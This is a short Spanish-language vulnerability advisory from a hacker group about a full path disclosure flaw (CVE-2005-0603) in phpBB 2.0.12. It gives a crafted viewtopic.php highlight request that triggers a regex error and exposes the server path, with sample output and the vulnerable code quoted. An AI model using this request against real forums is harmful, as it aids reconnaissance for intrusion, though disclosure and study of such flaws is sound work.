
Exploit de prueba de concepto para CVE-2005-0603, que demuestra una vulnerabilidad de divulgación de ruta completa en phpBB 2.0.12 mediante una expresión regular manipulada en el parámetro highlight de viewtopic.php.
Programa: phpBB 2.0.12 Página web: http://www.phpbb.com Versiones vulnerables: phpBB 2.0.12 y versiones inferiores Riesgo: Bajo Riesgo!! Impacto: Revelación de ruta completa
-==phpBB 2.0.12 Revelación de ruta completa==-
phpBB es un paquete de foro de discusión de código abierto de alto rendimiento, totalmente escalable y altamente personalizable. phpBB tiene una interfaz fácil de usar, un panel de administración simple y directo, y un FAQ útil. Basado en el potente lenguaje de servidor PHP y su elección de servidores de base de datos MySQL, MS-SQL, PostgreSQL o Access/ODBC, phpBB es la solución comunitaria gratuita ideal para todos los sitios web.
localhost y muchos foros
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
Mostrará algo como esto.
Advertencia: Falló la compilación: falta el corchete de cierre ] para la clase de caracteres en el desplazamiento 20 en /home/nst/forum/viewtopic.php(1110): código regexp en la línea 1
Dará una revelación de ruta completa y también una cosa que noté es que los mensajes cambian, no aparece nada. En la variable HighLight.
Aquí está el problema: -----[ Inicio Código Vulnerable ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ Fin Código Vulnerable ] ------------------------------------ No tomes prestado cosas, lol.
Todavía no xD
Todavía no xD
Bien, otra cosa que noté fue en php.ini
magic_quotes_gpc = On magic_quotes_sybase = Off
tienes que activar ambas (ON)
Descubierto por HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
¿Tienes preguntas? http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
Y mi gente colombiana